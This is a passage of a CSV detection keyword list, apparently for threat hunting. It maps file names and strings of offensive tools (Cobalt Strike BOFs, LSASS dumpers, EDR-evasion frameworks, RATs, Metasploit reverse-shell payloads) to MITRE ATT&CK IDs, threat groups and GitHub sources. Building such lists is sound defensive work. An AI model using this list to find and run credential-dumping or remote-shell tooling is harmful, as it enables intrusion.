Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Signal-Labs/NtdllUnpatcher*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z -*SigPloit*,offensive_tool_keyword,SigPloit,SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling protocols used in mobile operators regardless of the geneartion being in use. 
SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture,T1573 - T1562 - T1189 - T1190 - T1201,TA0002 - TA0003 - TA0007 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/SigPloiter/SigPloit,1,1,N/A,N/A,1,7,2,2019-12-17T16:51:23Z,2017-03-30T03:46:03Z -*sigthief.exe.manifest*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*SigThief.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*sigthief.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*SigThief-master*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*sigwhatever.exe*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*Silent Lsass Dump*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,0,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*silenthound.py*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,1,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*silenthound_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*silenthound_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*SilentHound-main*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/layer8secure/SilentHound,1,1,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*silentLsassDump*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*SilentMoonwalk.cpp*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*SilentMoonwalk.exe*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*SilentMoonwalk.sln*,offensive_tool_keyword,SilentMoonwalk,PoC 
Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z
-*SilentMoonwalk-master*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z
-*SilentProcessExitRegistrySetter.cpp*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z
-*SilentProcessExitRegistrySetter.exe*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z
-*SILENTTRINITY*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z
-*silenttrinity*.dll*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z
-*SillyRAT.git*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,1,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z
-*sillyrat.py*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,1,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z 
-*silver*/beacon.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*silver*implant.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z
-*SilverPoision*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/SilverPoision,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*SilverPoision/Rock-ON*,offensive_tool_keyword,Rock-ON,Rock-On is a all in one recon tool that will help your Recon process give a boost. It is mainley aimed to automate the whole process of recon and save the time that is being wasted in doing all this stuffs manually. A thorough blog will be up in sometime. 
Stay tuned for the Stable version with a UI,T1590 - T1210.001 - T1190 - T1213,TA0007 - TA0002 - TA0003,N/A,N/A,Information Gathering,https://github.com/SilverPoision/Rock-ON,1,1,N/A,N/A,3,288,70,2019-11-30T04:00:03Z,2019-06-10T04:42:32Z
-*SimoneLazzaris/ditty*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SimoneLazzaris/ditty,1,1,N/A,N/A,1,2,1,2022-03-10T16:15:14Z,2022-03-09T09:20:27Z
-*simple_dropper.ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z
-*SimpleHTTPServer.SimpleHTTPRequestHandler*,greyware_tool_keyword,simplehttpserver,quick web server in python,T1021.002 - T1059.006,TA0002 - TA0005,N/A,N/A,Data Exfiltration,https://docs.python.org/2/library/simplehttpserver.html,1,0,N/A,6,10,N/A,N/A,N/A,N/A
-*simplekeylogger.*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,1,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z
-*SimplyEmail.py*,offensive_tool_keyword,SimplyEmail,SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. 
Which I felt was desperately needed after building my first module for theHarvester.,T1210.001 - T1190 - T1583.001 - T1590,TA0007 - TA0002 - ,N/A,N/A,Reconnaissance,https://github.com/SimplySecurity/SimplyEmail,1,1,N/A,5,10,918,242,2023-01-12T22:20:25Z,2015-10-30T03:12:10Z
-*SimplyEmail-master*,offensive_tool_keyword,SimplyEmail,SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.,T1210.001 - T1190 - T1583.001 - T1590,TA0007 - TA0002 - ,N/A,N/A,Reconnaissance,https://github.com/SimplySecurity/SimplyEmail,1,1,N/A,5,10,918,242,2023-01-12T22:20:25Z,2015-10-30T03:12:10Z
-*SimplySecurity/SimplyEmail*,offensive_tool_keyword,SimplyEmail,SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.,T1210.001 - T1190 - T1583.001 - T1590,TA0007 - TA0002 - ,N/A,N/A,Reconnaissance,https://github.com/SimplySecurity/SimplyEmail,1,1,N/A,5,10,918,242,2023-01-12T22:20:25Z,2015-10-30T03:12:10Z
-*single_reverse_tcp_shell.s*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*single_shell_bind_tcp.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*single_shell_reverse_tcp.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*single_target_exploit.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*sipdump2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*sipvicious_svcrack* -u100,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*sitadel http://*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z
-*sitadel https://*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z
-*sitadel.py *,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation 
tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z
-*Sitadel-master.zip*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,1,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z
-*site-packages/wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-*-Situational-Awareness-BOF*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z
-*skahwah*wordsmith*,offensive_tool_keyword,wordsmith,The aim of Wordsmith is to 
assist with creating tailored wordlists and usernames that are primarilly based on geolocation.,T1210.001 - T1583.001 - T1583.002,TA0007 - ,N/A,N/A,Credential Access,https://github.com/skahwah/wordsmith,1,1,N/A,N/A,2,158,21,2018-05-03T13:44:01Z,2016-07-06T14:02:51Z
-*skelsec/jackdaw*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 - T1590 - T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,1,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z
-*SkipPasswordAgeCheck*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z
-*SkipPortScan*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z
-*skymem-get-mails *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z
-*SLACKAES256Handler.*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*slackor.db*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a 
command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z
-*sleep_python_bridge.sleepy*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z
-*sleep_python_bridge.striker*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
